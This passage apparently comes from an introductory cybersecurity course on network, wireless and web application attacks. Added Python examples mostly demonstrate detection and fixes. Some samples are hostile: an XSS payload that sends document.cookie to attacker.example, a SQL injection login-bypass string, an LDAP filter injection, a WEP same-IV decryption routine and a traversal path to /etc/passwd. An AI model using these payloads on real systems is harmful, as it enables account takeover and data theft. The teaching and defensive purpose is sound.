emails that encourage you to download a malicious attachment, or through a
software vulnerability.

1.3.4 Denial of Service Attacks


Denial of service (DoS) attacks are a type of network attack that is relatively
simple to conduct, even for an unskilled attacker. They are a major risk as they
usually result in some sort of interruption to network services, causing a
significant loss of time and money. Even operational technology (OT), the hardware
and software that controls physical devices or processes in buildings, factories or
utility providers, is vulnerable to DoS attacks, which in extreme circumstances can
cause a shutdown.
Overwhelming quantity of traffic
This is when a network, host or application is sent an enormous amount of data
at a rate which it cannot handle. This causes a slowdown in transmission or
response, or the device or service to crash.
Maliciously formatted packets
A packet is a collection of data that flows between a source and a receiver
computer or application over a network, such as the internet. When a
maliciously formatted packet is sent, the receiver will be unable to handle it.
For example, if an attacker forwards packets containing errors or improperly
formatted packets that cannot be identified by an application, this will cause
the receiving device to run very slowly or crash.

1.3.5 Avatar
Distributed denial of service (DDoS) attacks are similar but originate from
multiple coordinated sources. Here is how this happens:
1. An attacker builds a network (botnet) of infected hosts called zombies,
which are controlled by handler systems.
2. The zombie computers constantly scan and infect more hosts, creating
more and more zombies.
3. When ready, the hacker will instruct the handler systems to make the
botnet of zombies carry out a DDoS attack.
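The two traffic patterns above, a single host sending more than a service can handle and a botnet spreading the same load across many low-volume sources, can be told apart in connection logs. The Python below is an added example, not part of the original module: it builds a constructed log (the addresses are documentation ranges, not real traffic) and flags a plain DoS when one source exceeds a per-source rate, and a DDoS when the aggregate rate to a service is high while every individual source stays below that limit. The thresholds are assumptions to be tuned per service.

```python
from collections import defaultdict

def build_sample_log():
    """Constructed connection log (not captured traffic), one line per new
    connection: "<epoch_seconds> <src_ip> <dst_ip> <dst_port>"."""
    lines = []
    for t in range(100, 110):                       # background: 5 clients, 2 conns/s each
        for i in range(5):
            lines += [f"{t} 198.51.100.{10 + i} 203.0.113.5 443"] * 2
    for t in (105, 106):                            # DoS: one host opens 400 conns/s
        lines += [f"{t} 192.0.2.66 203.0.113.5 443"] * 400
    for i in range(300):                            # DDoS: 300 bots, 3 conns each, same second
        lines += [f"108 10.{i // 256}.{i % 256}.7 203.0.113.5 443"] * 3
    return lines

def analyse(lines, per_src_limit=100, aggregate_limit=500):
    """Bucket connections per second and per destination service.
    One source above per_src_limit is a plain DoS; an aggregate above
    aggregate_limit while every source stays low is the DDoS signature."""
    buckets = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
    for line in lines:
        ts, src, dst, port = line.split()
        buckets[int(ts)][(dst, port)][src] += 1
    alerts = []
    for ts in sorted(buckets):
        for (dst, port), per_src in buckets[ts].items():
            total = sum(per_src.values())
            top_src, top_count = max(per_src.items(), key=lambda kv: kv[1])
            if top_count > per_src_limit:
                alerts.append((ts, "dos", dst, port, top_src, top_count))
            if total > aggregate_limit and top_count <= per_src_limit:
                alerts.append((ts, "ddos", dst, port, len(per_src), total))
    return alerts

if __name__ == "__main__":
    for alert in analyse(build_sample_log()):
        print(alert)
```

The distinction matters operationally: a single-source flood can be blocked with one firewall rule, whereas the distributed case needs rate limiting per destination, upstream scrubbing or blackholing, because no individual source looks abnormal.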

1.3.6 Domain Name System


There are many essential technical services needed for a network to operate —
such as routing, addressing and domain naming. These are prime targets for
attack.
Domain reputation
The Domain Name System (DNS) translates a domain name, such as www.cisco.com, into
a numerical IP address so that computers can route traffic to it. If a DNS server does
not know an IP address, it asks another DNS server (a recursive resolver asks the
authoritative servers for the domain) and caches the answer for later queries.
An organization needs to monitor the reputation of its own domains and IP addresses,
for example whether they appear on blocklists, and should use reputation data about
external domains to block connections to those known to be malicious.
DNS spoofing
DNS spoofing or DNS cache poisoning is an attack in which false data is
introduced into a DNS resolver cache, the temporary store in which a resolver keeps
recently looked-up records so that it does not have to ask for them again.
These poisoning attacks exploit weaknesses in the DNS software, such as predictable
transaction IDs or source ports, or a resolver that accepts records the answering
server is not authoritative for. Once the cache holds the attacker’s record, every
client that uses that resolver is redirected for that domain to the attacker’s computer.
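An added example (not from the original module) of the checks a hardened resolver applies before accepting a reply, written in Python against plain dictionaries rather than wire-format DNS: the transaction ID and destination port must match the outstanding query, the question must match, and any record whose owner name lies outside the zone the answering server is authoritative for (its bailiwick) is discarded rather than cached. The query state, the example.com zone and the reply contents are constructed for the demonstration.

```python
import secrets

def new_query(qname, qtype="A", zone="example.com."):
    """State a resolver keeps for an outstanding query. The random TXID and
    random source port are the two values an off-path attacker has to guess."""
    return {"txid": secrets.randbelow(1 << 16), "sport": 1024 + secrets.randbelow(64512),
            "qname": qname.lower().rstrip(".") + ".", "qtype": qtype, "zone": zone}

def in_bailiwick(owner, zone):
    """True if owner is the zone apex or a name below it."""
    owner = owner.lower().rstrip(".") + "."
    return owner == zone or owner.endswith("." + zone)

def accept_response(query, response):
    """Checks a hardened resolver makes before caching anything.
    Returns (cacheable_records, discarded_records) or raises ValueError."""
    if response["txid"] != query["txid"]:
        raise ValueError("TXID mismatch")
    if response["dport"] != query["sport"]:
        raise ValueError("port mismatch")
    if (response["qname"].lower(), response["qtype"]) != (query["qname"], query["qtype"]):
        raise ValueError("question mismatch")
    cacheable, discarded = [], []
    for rr in response["answer"] + response["additional"]:
        (cacheable if in_bailiwick(rr["name"], query["zone"]) else discarded).append(rr)
    return cacheable, discarded

def demo():
    query = new_query("www.example.com")
    query.update(txid=0x1A2B, sport=40000)      # fixed here only to keep the demo deterministic
    response = {                                  # constructed reply from example.com's server
        "txid": 0x1A2B, "dport": 40000, "qname": "www.example.com.", "qtype": "A",
        "answer": [{"name": "www.example.com.", "type": "A", "data": "192.0.2.10"}],
        "additional": [
            {"name": "ns1.example.com.", "type": "A", "data": "192.0.2.53"},
            # out-of-bailiwick glue: a poisoning attempt against an unrelated domain
            {"name": "www.bank.example.", "type": "A", "data": "203.0.113.9"},
        ],
    }
    cacheable, discarded = accept_response(query, response)
    forged = dict(response, txid=(query["txid"] + 1) & 0xFFFF)   # off-path guess that misses
    try:
        accept_response(query, forged)
        forged_result = "accepted"
    except ValueError as err:
        forged_result = str(err)
    return {"cacheable": cacheable, "discarded": discarded, "forged": forged_result}

if __name__ == "__main__":
    print(demo())
```

With a fixed TXID and a fixed source port an attacker has one value in 65536 to guess; randomising both makes the brute-force space roughly 2^32 per query, and the bailiwick rule means even a lucky guess can only poison names under the zone that was actually being asked about.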
Domain hijacking
When an attacker wrongfully gains control of a target’s DNS information, they
can make unauthorized changes to it. This is known as domain hijacking.
The most common way of hijacking a domain name is to change the
administrator’s contact email address through social engineering or by hacking
into the administrator's email account. The administrator’s email address can
be easily found via the WHOIS record for the domain, which is of public record.
Uniform resource locator (URL)
A uniform resource locator (URL) is a unique identifier for finding a specific
resource on the Internet. Redirecting a URL commonly happens for legitimate
purposes.
For example, you have logged into an eLearning portal to begin this
Cybersecurity Essentials course. If you log out of the portal and return to it
another time, the portal will redirect you back to the login page.
It is this type of functionality that attackers can exploit. Instead of taking you to
the eLearning login page, they can redirect you to a malicious site.

1.3.7 Layer 2 Attacks


Layer 2 refers to the data link layer in the Open Systems Interconnection (OSI)
data communication model.
This layer moves frames between devices on the same physical network segment. Each
network interface has a hardware address, the media access control (MAC) address, and
the address resolution protocol (ARP) is used to find which MAC address currently holds
a given IP address.
In its simplest terms, the IP address says where a packet is ultimately going and the
MAC address identifies the next interface on the local link that should receive it; ARP
resolves IP addresses to MAC addresses so that frames can be delivered.
Because ARP has no authentication, any host on the segment can answer for any
address, and attackers often take advantage of this weakness in layer 2.
Spoofing
Spoofing, or poisoning, is a type of impersonation attack that takes advantage
of a trusted relationship between two systems.
 MAC address spoofing occurs when an attacker changes their device’s MAC address to
that of a valid device on the network, bypassing controls such as MAC filtering or
port security that trust the hardware address.
 ARP spoofing sends forged ARP messages across a LAN. This links the
attacker’s MAC address to the IP address of an authorized device, such as the default
gateway, so that traffic meant for that device is delivered to the attacker.
 IP spoofing sends IP packets with a forged source address in order to hide the
true origin or to impersonate a trusted host.

MAC Flooding
Devices on a network are connected via a network switch, which learns the MAC
address behind each port and forwards frames only to the port of the destination
device. MAC flooding sends a stream of frames with fake source MAC addresses until
the switch’s address table is full. Many switches then fall back to broadcasting
frames out of every port, like a hub, so that the attacker can capture traffic that
was never meant for them.
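As an added example (not part of the course text), the Python below implements two sensor checks that correspond to the attacks described above: ARP replies that change an already-learned IP-to-MAC binding or that answer no outstanding request, and a switch port that sources far more distinct MAC addresses than any legitimate host would. The ARP packets, frames and MAC addresses are constructed; the per-port limit of 8 is an assumption matching a typical port-security maximum.

```python
from collections import defaultdict

GATEWAY_MAC = "00:11:22:33:44:01"     # constructed addresses
HOST_MAC = "00:11:22:33:44:0a"
ATTACKER_MAC = "de:ad:be:ef:00:01"

SAMPLE_ARP = [  # constructed ARP traffic as a sensor on the LAN would see it
    {"op": "request", "smac": HOST_MAC, "sip": "10.0.0.10", "tip": "10.0.0.1"},
    {"op": "reply", "smac": GATEWAY_MAC, "sip": "10.0.0.1", "tip": "10.0.0.10"},
    {"op": "reply", "smac": ATTACKER_MAC, "sip": "10.0.0.1", "tip": "10.0.0.10"},   # poisoning
    {"op": "reply", "smac": ATTACKER_MAC, "sip": "10.0.0.7", "tip": "10.0.0.10"},   # gratuitous
]

SAMPLE_FRAMES = (  # constructed (switch_port, source_mac) pairs
    [("Gi0/1", HOST_MAC), ("Gi0/1", HOST_MAC), ("Gi0/2", GATEWAY_MAC)]
    + [("Gi0/3", f"02:00:00:{i >> 8:02x}:{i & 0xff:02x}:01") for i in range(500)]
)

def detect_arp_spoofing(packets, static_bindings=None):
    """Flag replies that change an already-learned IP->MAC binding and replies
    nobody asked for. Learned bindings are never overwritten, which mirrors a
    static ARP entry or DHCP-snooping-backed dynamic ARP inspection."""
    table = dict(static_bindings or {})
    pending = set()
    alerts = []
    for p in packets:
        if p["op"] == "request":
            pending.add(p["tip"])
            continue
        known = table.get(p["sip"])
        if known is not None and known != p["smac"]:
            alerts.append(("ip-mac-change", p["sip"], known, p["smac"]))
        elif p["sip"] not in pending:
            alerts.append(("unsolicited-reply", p["sip"], p["smac"]))
        pending.discard(p["sip"])
        table.setdefault(p["sip"], p["smac"])
    return alerts

def detect_mac_flooding(frames, max_macs_per_port=8):
    """Port-security style check: a port that sources more than a handful of
    distinct MACs is filling the switch's address table."""
    seen = defaultdict(set)
    for port, smac in frames:
        seen[port].add(smac)
    return {port: len(macs) for port, macs in seen.items() if len(macs) > max_macs_per_port}

if __name__ == "__main__":
    print(detect_arp_spoofing(SAMPLE_ARP))
    print(detect_mac_flooding(SAMPLE_FRAMES))
```

On managed switches the same two checks exist as features: dynamic ARP inspection validates replies against the DHCP snooping table, and port security caps the number of MAC addresses per port and shuts the port down when the cap is exceeded.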

1.3.9 Man-in-the-Middle and Man-in-the-Mobile Attacks


Attackers can intercept or modify communications between two devices to
steal information from or to impersonate one of the devices.
Man-in-the-Middle (MitM)
A MitM attack happens when a cybercriminal secretly positions themselves between two
communicating parties, for example by compromising a device or a network hop, without
the users’ knowledge. With this level of access, an attacker can intercept,
manipulate and relay false information between the sender and the intended
destination.
Man-in-the-Mobile (MitMo)
A variation of man-in-the-middle, MitMo is a type of attack used to take control
over a user’s mobile device. When infected, the mobile device is instructed to
exfiltrate user-sensitive information and send it to the attackers. ZeuS is one
example of a malware package with MitMo capabilities. It allows attackers to
quietly capture two-step verification SMS messages sent to users.

1.3.10 Avatar
A replay attack occurs when an attacker captures communication between two
hosts and later retransmits the message to the recipient, to trick the recipient
into doing what the attacker wants. This circumvents authentication mechanisms
that do not check whether a message is fresh.

1.3.11 Zero-Day Attacks


A zero-day attack or zero-day threat exploits software vulnerabilities before
they become known or before they are disclosed by the software vendor.
A network is extremely vulnerable to attack between the time an exploit is
discovered (zero hour) and the time it takes for the software vendor to develop
and release a patch that fixes this exploit.
Defending against such fast-moving attacks requires network security
professionals to adopt a more sophisticated and holistic view of any network
architecture.

1.3.12 Keyboard Logging


As the name suggests, keyboard logging or keylogging refers to recording or
logging every key struck on a computer’s keyboard.
Cybercriminals log keystrokes via software installed on a computer system or
through hardware devices that are physically attached to a computer, and
configure the keylogger software to send the log file to the criminal. Because it
has recorded all keystrokes, this log file can reveal usernames, passwords,
websites visited and other sensitive information.
Many anti-spyware suites can detect and remove unauthorized key loggers.

1.3.13 Avatar
It is important to note that keylogging software can be legitimate. Many
parents use it to keep an eye on their children’s internet behavior.
1.3.15 Defending Against Attacks
Organizations can take several steps to defend against various attacks. These
include the following:
 Configure firewalls to drop any packets arriving from outside the network whose
source addresses indicate that they originated from inside the network (ingress
filtering).
 Ensure patches and upgrades are current.
 Distribute the workload across server systems.
 Network devices use Internet Control Message Protocol (ICMP) packets to
send error and control messages, such as whether or not a device can
communicate with another on the network. To reduce exposure to ICMP-based
floods, organizations can rate-limit or block unsolicited external ICMP packets
at their firewalls, while still permitting the messages needed for path MTU
discovery and troubleshooting.

1.4 Wireless and Mobile Device Attacks


1.4.1 Avatar
The widespread use of the Internet and mobile devices means that now, more
than ever before, we can communicate and work on the go, without the need
for cables and wires! But this also breeds more opportunity for cybercriminals
to access the sensitive information they are after.

1.4.2 Grayware and SMiShing


Grayware is any unwanted application that behaves in an annoying or
undesirable manner. And while grayware may not carry any recognizable
malware, it may still pose a risk to the user by, for example, tracking your
location or delivering unwanted advertising.
Authors of grayware typically maintain legitimacy by including these ‘gray’
capabilities in the small print of the software license agreement. This factor
poses a growing threat to mobile security in particular, as many smartphone
users install mobile apps without really considering this small print.
Short message service phishing or SMiShing is another tactic used by attackers
to trick you. Fake text messages prompt you to visit a malicious website or call
a fraudulent phone number, which may result in malware being downloaded
onto your device or personal information being shared.

1.4.3 Rogue Access Points


A rogue access point is a wireless access point installed on a secure network
without explicit authorization. Although it could potentially be set up by a well-
intentioned employee looking for a better wireless connection, it also presents
an opportunity for attackers looking to gain access to an organization’s
network.
An attacker will often use social engineering tactics to gain physical access to
an organization’s network infrastructure and install the rogue access point.
Also known as a criminal’s access point, the access point can be set up as a
MitM device to capture your login information.
Because 802.11 management frames are not authenticated on most older networks, the
attacker can forge a deauthentication frame that appears to come from the legitimate
access point (or spoof your MAC address and send it to the access point) to knock
your device off the network. When your device reconnects, it may choose the rogue
access point, which advertises the same network name with a stronger signal.

An evil twin attack describes a situation where the attacker’s access point is set up to look
like a better connection option. Once you connect to the evil access point, the attacker can
analyze your network traffic and execute MitM attacks.

1.4.4 Radio Frequency Jamming

Wireless signals are susceptible to electromagnetic interference (EMI), radio frequency
interference (RFI) and even lightning strikes or noise from fluorescent lights.

Attackers can take advantage of this fact by deliberately jamming the transmission of a
radio or satellite station to prevent a wireless signal from reaching the receiving station.
In order to successfully jam the signal, the frequency, modulation and power of the RF
jammer need to match those of the device that the attacker is seeking to disrupt.

1.4.5 Avatar

You have probably heard of Bluetooth but do you know exactly what it is and how it
works?

Bluetooth is a short-range, low-power protocol that transmits data in a personal area
network (PAN) and uses pairing to establish a relationship between devices such as
mobiles, laptops and printers. Cybercriminals have discovered ways to exploit the
vulnerabilities between these connections.

1.4.6 Bluejacking and Bluesnarfing

Due to the limited range of Bluetooth, an attacker must be within range of their target. Here
are some ways that they can exploit a target’s device without their knowledge.

Bluejacking uses wireless Bluetooth technology to send unauthorized messages or shocking
images to another Bluetooth device.

Bluesnarfing occurs when an attacker copies information, such as emails and contact lists,
from a target’s device over a Bluetooth connection.

1.4.7 Attacks Against Wi-Fi Protocols

Wired equivalent privacy (WEP) and Wi-Fi protected access (WPA) are security protocols
that were designed to secure wireless networks that are vulnerable to attacks.

WEP was developed to provide data transmitted over a wireless local area network
(WLAN) with a level of protection comparable to what is usually expected of a traditional
wired network. It added security to wireless networks by encrypting the data.

WEP used a single shared key for encryption. The problem, however, was that WEP had no
provision for key management, so the number of people sharing the same key continually
grew, giving criminals access to a large amount of traffic encrypted under it.
Furthermore, WEP’s initialization vector (IV), which is prepended to the shared key to
form the per-packet RC4 key, was only 24 bits long, was transmitted in cleartext, and
was frequently reused, so two frames encrypted with the same IV share a keystream.

To address this and replace WEP, WPA and then WPA2 were developed as improved
security protocols. Unlike with WEP, an attacker cannot recover WPA2’s encryption key
simply by observing encrypted traffic. However, they can still use a packet sniffer to
analyze the packets going between an access point and a legitimate user, and a
captured WPA2-Personal handshake can be used for an offline dictionary attack against
a weak pre-shared passphrase.
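The following Python is an added example, not from the original module, that makes the IV problem concrete. It implements RC4, keys it WEP-style with IV || key, and shows that two frames encrypted under the same IV reveal the XOR of their plaintexts, so a known plaintext (predictable frame headers, for instance) exposes the other frame without the key. It also computes how many frames a 24-bit IV can carry before a repeat becomes more likely than not. The 40-bit key, the IV and the HTTP request lines are constructed values.

```python
def rc4_keystream(key, n):
    """Plain RC4 (key scheduling + pseudo-random generation) producing n bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def xor_bytes(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(shared_key, iv, plaintext):
    """WEP keys RC4 with IV || shared key; the 3-byte IV is sent in the clear."""
    return xor_bytes(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))

def recover_second_plaintext(c1, c2, known_p1):
    """Same IV and key => same keystream, so c1 ^ c2 == p1 ^ p2, and a known p1
    reveals p2 without ever touching the key."""
    return xor_bytes(xor_bytes(c1, c2), known_p1)

def frames_until_iv_collision(iv_bits=24, probability=0.5):
    """Birthday bound: how many random IVs until a repeat is at least this likely."""
    space = 1 << iv_bits
    p_no_collision, n = 1.0, 0
    while p_no_collision > 1 - probability:
        p_no_collision *= 1 - n / space
        n += 1
    return n

if __name__ == "__main__":
    key, iv = bytes([1, 2, 3, 4, 5]), b"\x00\x00\x01"          # constructed 40-bit key and IV
    p1, p2 = b"GET /index.html HTTP/1.1", b"POST /login.cgi HTTP/1.1"
    c1, c2 = wep_encrypt(key, iv, p1), wep_encrypt(key, iv, p2)
    print(recover_second_plaintext(c1, c2, p1))
    print(frames_until_iv_collision())
```

A busy access point sends thousands of frames a minute, so by the birthday bound the first IV repeat arrives within a few thousand frames even when IVs are chosen at random; many WEP cards simply counted up from zero on reset, which made collisions across stations even more frequent.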

1.4.9 Wi-Fi and Mobile Defense


There are several steps that organizations and users need to take to defend against wireless
and mobile device attacks. These include the following:

 Take advantage of basic wireless security features such as authentication and
encryption by changing the default configuration settings.
 Restrict access point placement by placing these devices outside the firewall or
within a demilitarized zone — a perimeter network that protects an organization’s
LAN from untrusted devices.
 Use WLAN tools such as NetStumbler to detect rogue access points or unauthorized
workstations.
 Develop a policy for guest access to an organization’s Wi-Fi network.
 Employees in an organization should use a remote access VPN for WLAN access.

1.5 Application Attacks

1.5.1 Avatar

Attacks carried out through web applications are becoming increasingly common.

They involve cybercriminals taking advantage of vulnerabilities in the coding of a web-based
application to gain access to a database or server. Let’s take a look at some examples.

1.5.2 Cross-Site Scripting

Cross-site scripting (XSS) is a common vulnerability found in many web applications. This
is how it works:

1. Cybercriminals exploit the XSS vulnerability by injecting scripts containing
malicious code into a web page, typically through input that the application echoes
back without encoding it.
2. The web page is accessed by the victim, and the malicious script is delivered to
their browser without their knowledge, where it runs in the security context of the
trusted site.
3. The malicious script can access any cookies, session tokens or other sensitive
information about the user, which is sent back to the cybercriminal.
4. Armed with this information, the cybercriminal can impersonate the user.
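An added example (not from the original module) in Python showing the defect and the fix: a comment rendered by string interpolation carries an injected script to the browser, while the same comment rendered with html.escape does not. Because escaping alone does not make a URL safe inside an href attribute, the example also restricts link schemes to http(s). The payload and the attacker.example host are constructed.

```python
import html
from urllib.parse import urlsplit

# Constructed payload of the kind described above: ships the session cookie to the attacker.
PAYLOAD = '<script>fetch("https://attacker.example/c?" + document.cookie)</script>'

def render_comment_unsafe(comment):
    """Interpolates user text straight into HTML: the browser runs the script."""
    return f'<p class="comment">{comment}</p>'

def render_comment_safe(comment):
    """Context-correct output encoding for HTML text and attribute values."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'

def safe_href(url):
    """Escaping is not enough inside href: a javascript: URL is still executable.
    Allow only http(s) and then attribute-escape the value."""
    if urlsplit(url.strip()).scheme.lower() not in ("http", "https"):
        return "#"
    return html.escape(url, quote=True)

def contains_script(rendered):
    return "<script" in rendered.lower()

if __name__ == "__main__":
    print(render_comment_unsafe(PAYLOAD))
    print(render_comment_safe(PAYLOAD))
    print(safe_href("javascript:alert(document.cookie)"))
```

Marking the session cookie HttpOnly keeps document.cookie from exposing it to an injected script, and a Content Security Policy that disallows inline scripts limits what an injected script can do; neither replaces output encoding, they reduce the damage when it is missed.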
1.5.3 Code Injection

Most modern websites use a database, such as a Structured Query Language (SQL) or an
Extensible Markup Language (XML) database, to store and manage data. Injection attacks
seek to exploit weaknesses in these databases.

XML injection attack

An XML injection attack can corrupt the data on the XML database and threaten the
security of the website.

It works by interfering with an application’s processing of XML data or of a query built
from user input.

Cybercriminals can manipulate this query by supplying input that changes its structure.
This can grant them access to sensitive information stored in the database and allow
them to make unauthorized changes to the website’s data.

SQL injection attack

Cybercriminals can carry out an SQL injection attack on websites or any SQL database by
inserting a malicious SQL statement in an entry field.

This attack takes advantage of a vulnerability in which the application builds the SQL
statement by concatenating user-supplied data into it, instead of keeping the data
separate from the statement with parameterized queries.

As a result, the cybercriminal can gain unauthorized access to information stored on the
database, from which they can spoof an identity, modify existing data, destroy data or even
become an administrator of the database server itself.
DLL injection attack

A dynamic link library (DLL) file is a library that contains a set of code and data for
carrying out a particular activity in Windows. Applications use this type of file to add
functionality that is not built-in, when they need to carry out this activity.

DLL injection allows a cybercriminal to trick an application into calling a malicious DLL
file, which executes as part of the target process.

LDAP injection attack

The Lightweight Directory Access Protocol (LDAP) is an open protocol for querying and
modifying directory services, and is widely used to authenticate users.

An LDAP injection attack exploits input validation vulnerabilities by injecting filter
metacharacters into queries sent to LDAP servers, giving cybercriminals an opportunity
to bypass authentication or extract sensitive information from an organization’s LDAP
directory.
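The Python below is an added example (not the module’s own code) that demonstrates both the SQL and the LDAP case above on constructed data. The vulnerable login builds its query by string formatting, so a username of ' OR '1'='1' -- turns the WHERE clause into one that matches the first user; the parameterized version passes the same input as data and matches nothing. For LDAP, the same idea is shown with the RFC 4515 filter escaping that a client library should apply. The user table and its clear-text passwords exist only to keep the demo short.

```python
import sqlite3

def setup_db():
    """In-memory demo database. Passwords are stored in clear text only to keep
    the example short; a real system stores salted hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
                     [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return conn

def login_vulnerable(conn, username, password):
    # User input is pasted into the SQL text, so quotes and comment markers
    # supplied by the attacker become part of the statement.
    sql = f"SELECT username, role FROM users WHERE username = '{username}' AND password = '{password}'"
    return conn.execute(sql).fetchone()

def login_parameterized(conn, username, password):
    # Placeholders keep data out of the grammar: the engine never re-parses it as SQL.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()

LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

def ldap_escape_filter(value):
    """RFC 4515 escaping for a value placed inside an LDAP search filter."""
    return "".join(LDAP_ESCAPES.get(ch, ch) for ch in value)

def ldap_filter_vulnerable(username):
    return f"(&(uid={username})(objectClass=person))"

def ldap_filter_safe(username):
    return f"(&(uid={ldap_escape_filter(username)})(objectClass=person))"

if __name__ == "__main__":
    conn = setup_db()
    payload = "' OR '1'='1' --"
    print(login_vulnerable(conn, payload, "wrong"))        # logs in as the first user
    print(login_parameterized(conn, payload, "wrong"))     # None
    print(ldap_filter_vulnerable("*)(uid=*))(|(uid=*"))    # filter now matches every entry
    print(ldap_filter_safe("*)(uid=*))(|(uid=*"))
```

The database user the application connects as should also hold only the privileges the application needs; parameterization stops the injection, least privilege limits what a missed one can reach.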

1.5.4 Buffer Overflow

Buffers are memory areas allocated to an application. A buffer overflow occurs when data
is written beyond the limits of a buffer. The excess data overwrites adjacent memory
belonging to the same process, such as other variables, heap metadata or a saved return
address. This can lead to a system crash or data compromise, or provide escalation of
privileges.

These memory flaws can also give attackers complete control over a target’s device. For
example, by overwriting a saved return address an attacker can redirect the running
program to instructions of their choosing and, as a result, install malware and access
the internal network from the compromised device.

1.5.5 Avatar

Did you know that research carried out by Carnegie Mellon University estimates that nearly
half of all exploits of computer programs stem from some form of buffer overflow?

1.5.6 Remote Code Executions

Remote code execution allows a cybercriminal to take advantage of application
vulnerabilities to execute any command with the privileges of the user running the
application on the target device.

Privilege escalation exploits a bug, design flaw or misconfiguration in an operating system
or software application to gain access to resources that are normally restricted.

Metasploit

The Metasploit Project is a computer security project that provides information about
security vulnerabilities and aids penetration testing. Among the tools they have developed
is the Metasploit Framework, which can be used for developing and executing exploit code
against a remote target.

Meterpreter, in particular, is a payload within Metasploit that allows users to take control of
a target’s device by writing their own extensions and uploading these files into a running
process on the device. These files are loaded and executed from memory, so they never
touch the hard drive. This means that such files can evade file-based antivirus detection.

Meterpreter also has a module for controlling a remote system’s webcam. Once
Meterpreter is installed on a target device, the Metasploit user can view and capture images
from the target’s webcam.

1.5.7 Other Application Attacks

Every piece of information that an attacker receives about a targeted system or application
can be used as a valuable weapon for launching a dangerous attack.

Cross-site request forgery (CSRF)

CSRF describes the malicious exploit of a website where unauthorized commands are
submitted from a user’s browser to a trusted web application.

A malicious website can transmit such commands through specially-crafted image tags,
hidden forms or JavaScript requests — all of which can work without the user’s
knowledge.

Race condition attack

Also known as a time-of-check to time-of-use (TOCTOU) attack, a race condition
attack happens when a computing system that is designed to handle tasks in a specific
sequence is made to perform two or more operations at the same time, so that a check
(of a permission or an account balance, for example) is no longer valid by the time its
result is used.

For example, operating systems are made up of threads, the smallest sequence of
program instructions that can be scheduled independently. When two or more threads access
shared data and try to change it at the exact same time without synchronization, a
race condition exists, and an attacker who can influence the timing can exploit it.

Improper input handling attack


Data inputted by a user that is not properly validated can affect the data flow of a program
and cause critical vulnerabilities in systems and applications that result in buffer overflow
or SQL injection attacks.

Error handling attack

Attackers can use error messages to extract specific information such as the hostnames of
internal systems and directories or files that exist on a given web server — as well as
database, table and field names that can be used to craft SQL injection attacks.

Application programming interface (API) attack

An API is the interface through which a client sends requests to a system and receives
the system’s responses. An API attack occurs when a cybercriminal abuses an API endpoint,
for example by calling it without proper authentication, enumerating object identifiers
or exceeding intended rate limits.

Replay attack

This describes a situation where a valid data transmission is maliciously or fraudulently
repeated or delayed by an attacker, who intercepts, amends and resubmits the data to get the
receiver to do whatever they want.
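An added example, not from the original module, of the defence against the replay attacks described in 1.3.10 and here: the sender covers a timestamp, a fresh random nonce and the message body with an HMAC, and the receiver authenticates the tag, checks the timestamp against a freshness window, and rejects any nonce it has already accepted within that window. The shared key, the fixed clock value and the transfer message are constructed for the demonstration.

```python
import hashlib
import hmac
import secrets
import time

# Assumption: a key already shared between the two endpoints (constructed value).
SHARED_KEY = b"constructed-demo-key-do-not-reuse"

def _mac(key, ts, nonce, body):
    return hmac.new(key, f"{ts}|{nonce}|{body}".encode(), hashlib.sha256).hexdigest()

def sign_message(key, body, now=None, nonce=None):
    """Sender side: timestamp plus a fresh random nonce, both covered by the HMAC."""
    ts = int(time.time() if now is None else now)
    nonce = nonce or secrets.token_hex(16)
    return {"ts": ts, "nonce": nonce, "body": body, "tag": _mac(key, ts, nonce, body)}

class ReplayGuard:
    """Receiver side: authenticate, check freshness, then reject any nonce already
    seen inside the freshness window. Old nonces are purged so memory stays bounded."""
    def __init__(self, key, window_seconds=30):
        self.key, self.window, self.seen = key, window_seconds, {}

    def verify(self, msg, now=None):
        now = time.time() if now is None else now
        expected = _mac(self.key, msg["ts"], msg["nonce"], msg["body"])
        if not hmac.compare_digest(expected, msg["tag"]):
            return "rejected: bad tag"          # tampered or forged
        if abs(now - msg["ts"]) > self.window:
            return "rejected: stale"            # outside the freshness window
        self.seen = {n: t for n, t in self.seen.items() if now - t <= self.window}
        if msg["nonce"] in self.seen:
            return "rejected: replay"           # the attack described above
        self.seen[msg["nonce"]] = msg["ts"]
        return "accepted"

def demo():
    guard = ReplayGuard(SHARED_KEY)
    t0 = 1_700_000_000                          # fixed clock for a deterministic run
    msg = sign_message(SHARED_KEY, "transfer 100 to acct 42", now=t0, nonce="n1")
    results = [guard.verify(msg, now=t0 + 1)]                      # genuine message
    results.append(guard.verify(msg, now=t0 + 5))                  # captured and replayed
    results.append(guard.verify(dict(msg, body="transfer 100 to acct 666"), now=t0 + 2))
    results.append(guard.verify(sign_message(SHARED_KEY, "ping", now=t0, nonce="n2"), now=t0 + 120))
    return results

if __name__ == "__main__":
    print(demo())
```

The timestamp alone is not enough, because a replay inside the window would still be accepted; the nonce alone is not enough, because the receiver would have to remember every nonce forever. Together they bound both the attacker’s replay window and the receiver’s memory. Clock skew between the parties must stay well inside the window, which is one reason TLS and similar protocols derive per-session keys instead of relying on wall-clock time.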

Directory traversal attack

Directory traversal occurs when an attacker is able to read files on the webserver outside of
the directory of the website. An attacker can then use this information to download server
configuration files containing sensitive information, potentially expose more server
vulnerabilities or even take control of the server!
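The Python below is an added example (not from the original module) of the traversal described above and the standard defence. It shows where a naive join of web root and request path ends up for ../../etc/passwd, then a handler that decodes the path once, canonicalises it with resolve() and refuses anything that no longer lies under the web root. The web root is a temporary directory created for the demonstration.

```python
import os
import tempfile
from pathlib import Path
from urllib.parse import unquote

def naive_target(root, requested):
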